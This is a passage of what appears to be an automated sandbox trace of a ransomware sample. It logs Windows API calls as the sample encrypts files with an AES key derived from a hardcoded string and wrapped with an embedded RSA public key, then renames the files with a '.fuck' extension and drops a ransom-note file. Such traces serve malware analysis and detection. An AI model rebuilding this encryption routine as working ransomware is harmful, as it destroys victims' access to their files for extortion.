Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.645] GetLastError () returned 0x5 [0239.645] GetLastError () returned 0x5 [0239.645] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.645] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.645] GetLastError () returned 0x5 [0239.645] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico")) returned 0x20 [0239.646] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", dwFileAttributes=0x80) returned 0 [0239.646] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.646] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.647] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.647] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.650] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.650] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.650] CryptHashData (hHash=0x28bf158, pbData=0x2857420, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.650] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf158, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bef18) returned 1 [0239.650] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.650] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.650] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28add68) returned 1 [0239.651] CryptImportPublicKeyInfo (in: hCryptProv=0x28add68, dwCertEncodingType=0x1, pInfo=0x28c9c18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9c48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9c50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bf098) returned 1 [0239.651] CryptEncrypt (in: hKey=0x28bf098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.651] CryptEncrypt (in: hKey=0x28bf098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28addf0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28addf0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.651] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28addf0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.651] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.652] CryptEncrypt (in: hKey=0x28bef18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.652] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.652] CloseHandle (hObject=0xffffffff) returned 1 [0239.652] CloseHandle (hObject=0xffffffff) returned 1 [0239.652] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), bFailIfExists=0) returned 0 [0239.652] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", dwFileAttributes=0x0) returned 0 [0239.653] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.gsg")) returned 0 [0239.653] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.fuck")) returned 0 [0239.653] CryptDestroyHash (hHash=0x28bf158) returned 1 [0239.653] CryptDestroyKey (hKey=0x28bef18) returned 1 [0239.653] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.653] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.653] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.653] GetLastError () returned 0x5 [0239.654] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico")) returned 0x20 [0239.654] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", dwFileAttributes=0x80) returned 0 [0239.654] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.654] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.655] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.655] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.657] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.658] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.658] CryptHashData (hHash=0x28bef18, pbData=0x28570b0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.658] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bef18, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28beb58) returned 1 [0239.658] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.658] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.658] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28ae120) returned 1 [0239.659] CryptImportPublicKeyInfo (in: hCryptProv=0x28ae120, dwCertEncodingType=0x1, pInfo=0x28ca1c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca1f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca200*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bef98) returned 1 [0239.659] CryptEncrypt (in: hKey=0x28bef98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.659] CryptEncrypt (in: hKey=0x28bef98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ae010*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ae010*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.659] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ae010, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.659] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d7a98, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d7a98, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.659] CryptEncrypt (in: hKey=0x28beb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7a98*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d7a98*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.659] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7a98, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.659] CloseHandle (hObject=0xffffffff) returned 1 [0239.659] CloseHandle (hObject=0xffffffff) returned 1 [0239.659] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), bFailIfExists=0) returned 0 [0239.660] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", dwFileAttributes=0x0) returned 0 [0239.660] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.gsg")) returned 0 [0239.660] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.fuck")) returned 0 [0239.661] CryptDestroyHash (hHash=0x28bef18) returned 1 [0239.661] CryptDestroyKey (hKey=0x28beb58) returned 1 [0239.661] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.661] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.661] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.661] GetLastError () returned 0x5 [0239.661] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico")) returned 0x20 [0239.661] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", dwFileAttributes=0x80) returned 0 [0239.662] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.662] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.662] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.663] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.666] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.666] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.666] CryptHashData (hHash=0x28bf218, pbData=0x276da18, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.666] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bef18) returned 1 [0239.666] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.666] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.666] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28ae1a8) returned 1 [0239.666] CryptImportPublicKeyInfo (in: hCryptProv=0x28ae1a8, dwCertEncodingType=0x1, pInfo=0x28c99a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c99d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c99e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28beb58) returned 1 [0239.666] CryptEncrypt (in: hKey=0x28beb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.666] CryptEncrypt (in: hKey=0x28beb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x287fb98*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x287fb98*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.667] WriteFile (in: hFile=0xffffffff, lpBuffer=0x287fb98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.667] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d7a98, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d7a98, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.667] CryptEncrypt (in: hKey=0x28bef18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7a98*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d7a98*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.667] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7a98, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.667] CloseHandle (hObject=0xffffffff) returned 1 [0239.667] CloseHandle (hObject=0xffffffff) returned 1 [0239.667] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), bFailIfExists=0) returned 0 [0239.668] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", dwFileAttributes=0x0) returned 0 [0239.668] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.gsg")) returned 0 [0239.669] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.fuck")) returned 0 [0239.669] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.669] CryptDestroyKey (hKey=0x28bef18) returned 1 [0239.669] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.669] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.669] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.669] GetLastError () returned 0x5 [0239.669] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml")) returned 0x20 [0239.669] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x80) returned 0 [0239.670] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.670] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.671] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.671] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.673] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.673] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.673] CryptHashData (hHash=0x28bf018, pbData=0x276de00, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.673] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bee98) returned 1 [0239.673] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 